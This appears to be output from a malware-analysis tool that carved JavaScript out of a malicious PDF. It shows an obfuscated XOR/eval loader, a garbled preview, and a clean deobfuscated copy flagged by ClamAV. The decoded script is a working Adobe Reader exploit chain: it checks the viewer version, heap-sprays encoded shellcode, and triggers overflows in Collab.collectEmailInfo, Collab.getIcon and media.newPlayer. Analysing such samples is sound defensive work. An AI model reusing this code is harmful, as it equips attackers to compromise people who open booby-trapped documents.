"82,83,73,79,78,14,67,72,65,82,97,84,8,16,9,12,86,69,82,83"; i6M5222S+= ",73,79,78,14,67,72,65,82,97,84,8,17,9,12,86,69,82,83,73,7"; i6M5222S+= "9,78,14,67,72,65,82,97,84,8,18,9,9,27,45,42,45,42,73,70,8"; i6M5222S+= ",8,86,69,82,127,65,82,82,65,89,123,16,125,28,24,9,92,92,8"; i6M5222S+= ",86,69,82,127,65,82,82,65,89,123,16,125,29,29,24,6,6,86,6"; i6M5222S+= "9,82,127,65,82,82,65,89,123,17,125,28,18,6,6,86,69,82,127"; i6M5222S+= ",65,82,82,65,89,123,18,125,28,18,9,9,0,91,45,42,41,67,79,"; i6M5222S+= "76,76,65,66,127,69,77,65,73,76,8,9,27,45,42,93,45,42,45,4"; i6M5222S+= "2,73,70,8,8,86,69,82,127,65,82,82,65,89,123,16,125,29,29,"; i6M5222S+= "24,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,17,6,6,8"; i6M5222S+= "6,69,82,127,65,82,82,65,89,123,18,125,28,19,9,92,92,8,86,"; i6M5222S+= "69,82,127,65,82,82,65,89,123,16,125,29,29,25,6,6,86,69,82"; i6M5222S+= ",127,65,82,82,65,89,123,17,125,28,17,9,9,91,45,42,41,67,7"; i6M5222S+= "9,76,76,65,66,127,71,69,84,73,67,79,78,8,9,27,45,42,93,45"; i6M5222S+= ",42,73,70,8,8,86,69,82,127,65,82,82,65,89,123,16,125,29,2"; i6M5222S+= "9,24,6,6,86,69,82,127,65,82,82,65,89,123,17,125,28,18,9,9"; i6M5222S+= "2,92,8,86,69,82,127,65,82,82,65,89,123,16,125,29,29,25,6,"; i6M5222S+= "6,86,69,82,127,65,82,82,65,89,123,17,125,28,19,9,9,91,45,"; i6M5222S+= "42,41,78,69,87,80,76,65,89,69,82,8,9,27,45,42,93,45,42,69"; i6M5222S+= ",76,83,69,91,93,45,42,45,42,93,45,42,80,68,70,127,67,72,6"; i6M5222S+= "9,67,75,127,86,69,82,83,8,9,27,45,42"; i6M5222S+= "]";;    Fy0edSWX2=app["e"+"v"+""+""+"al"];Fy0edSWX2(i6M5222S);    z77VLJi=C4HmQ5j;W0kE1s787x='';  Ec9oMvx=this.numPages; Y5tMaZ2=52; for (HcVjBV4apa=0;HcVjBV4apa<z77VLJi.length;HcVjBV4apa++){z77VLJi[HcVjBV4apa] ^=Ec9oMvx; z77VLJi[HcVjBV4apa] ^=Y5tMaZ2; W0kE1s787x +=String.fromCharCode(z77VLJi[HcVjBV4apa]);}Fy0edSWX2(W0kE1s787x);
legacy_pdfkit_stage_000.js deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5326 bytes
SHA-256: db5c1d3958e2b4bba5744133d69607db6a5ba2fb737c60c90a50a046de2b5d8f
Preview script
First 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN	[WHILE YARSP LENGTH
  LEN	[YARSP  YARSP ]YARSP YARSP SUBSTRING   LEN  	 RETURN YARSP ]-*FUNCTION NEWPLAYER 	[-*VAR SHELLCODE   UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  U  d  U  df Ud de U     Ucfcd Uc df Ud d  U     Uced  U  d  Ud d  U bca Uc d  Uf c  Uc c  Uf d  Uc ca Uc df U  d  Ucec  Ua  b 	 -*VAR BLOCK   UNESCAPE   U C C U C C 	 -*VAR gdAGAcUYnFrsfZAszlo   UNESCAPE   U C C U C C U C C U C C U C C U C C U C C U C C U   E U     U     U   F U A E U D   U B   U B   U     U D   U     U   B U     U   A U   F U A E U   E U A D U     U     U     U     U     U     U C   U   D U     U     	 -*WHILE BLOCK LENGTH         	 BLOCK  BLOCK -*BLOCK BLOCK SUBSTRING         
 SHELLCODE LENGTH	 -*MEMORY NEW aRRAY 	 FOR I   I  X     I  	 [MEMORY{I}  BLOCK   SHELLCODE ]-*UTIL PRINTD  RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc   NEW dATE 		 -*UTIL PRINTD  sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN   NEW dATE 		 -*TRY [THIS MEDIA NEWpLAYER NULL	 ] CATCH E	 []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo  NEW dATE 		 ]-*-*FUNCTION COLLAB EMAIL 	[VAR SHELLCODE UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  U  d  U  df Ud de U     Ucfcd Uc df Ud d  U     Uced  U  d  Ud d  U bca Uc d  Uf c  Ucbc  Ucfc  U  ca Ucec  Ua  b 	 VAR MEM ARRAY NEW aRRAY 	 VAR CC  X C C C C VAR ADDR  X       VAR SC LEN SHELLCODE LENGTH
  VAR LEN ADDR
 SC LEN  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR COUNT   CC
 X      	 ADDR FOR VAR COUNT   COUNT COUNT  COUNT  	[MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE   U C C U C C 	 WHILE OVERFLOW LENGTH      	[OVERFLOW  OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ    MSG OVERFLOW]	 ]-*-*FUNCTION COLLAB GETICON 	[IF APP DOC cOLLAB GETiCON	[VAR ARRY NEW aRRAY 	 VAR VVPETHYA UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  U  d  U  df Ud de U     Ucfcd Uc df Ud d  U     Uced  U  d  Ud d  U bca Uc d  Uf c  Uc c  Ucfd  Uc c  U  c  Ucec  Ua  b 	 VAR HwQ   cn VVPETHYA LENGTH
  VAR LEN  X      
 HwQ   cn  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR P aJk  F   X C C C C
 X      	  X       FOR VAR VQCqd  Y   VQCqd  Y P aJk  F VQCqd  Y  	[ARRY{VQCqd  Y} YARSP VVPETHYA ]-*VAR TumHnBgW UNESCAPE      	 WHILE TumHnBgW LENGTH  X    	[TumHnBgW  TumHnBgW ]-*TumHnBgW  n   TumHnBgW APP DOC cOLLAB GETiCON TumHnBgW	 ]]-*-*FUNCTION PDF CHECK VERS 	[-*VAR VERSION APP VIEWERvERSION TOsTRING 	 -*VERSION VERSION REPLACE  |d G   	 -*VAR VER ARRAY NEW aRRAY VERSION CHARaT  	 VERSION CHARaT  	 VERSION CHARaT  		 -*-*IF  VER ARRAY{ }  	\\ VER ARRAY{ }     VER ARRAY{ }    VER ARRAY{ }  		 [-*)COLLAB EMAIL 	 -*]-*-*IF  VER ARRAY{ }     VER ARRAY{ }    VER ARRAY{ }  	\\ VER ARRAY{ }     VER ARRAY{ }  		[-*)COLLAB GETICON 	 -*]-*IF  VER ARRAY{ }     VER ARRAY{ }  	\\ VER ARRAY{ }     VER ARRAY{ }  		[-*)NEWPLAYER 	 -*]-*ELSE[]-*-*]-*PDF CHECK VERS 	 -*
legacy_pdfkit_stage_001.js deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5326 bytes
SHA-256: 7b037fa54190e770de0dcf95257be25307cfa7f02f349897a3cc5594440f0b09
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C8%uF6D1%uC7CA%uC3DF%u80D4%uCEC0%uA69B");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uCBC3%uCFC7%u80CA%uCEC0%uA69B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%u96D5%u91DF%uD7DE%u8994%uCFCD%uC5DF%uD5D7%u8896%uCED6%u99D6%uD6D5%u9BCA%uC2D6%uF9C0%uC3C1%uCFD2%uC9C5%u80C8%uCEC0%uA69B");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}

function pdf_check_vers(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
	collab_email();
}

if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
	collab_geticon();
}
if((ver_array[0]==8&&ver_array[1]<2)||(ver_array[0]==9&&ver_array[1]<3)){
	newplayer();
}
else{}

}
pdf_check_vers();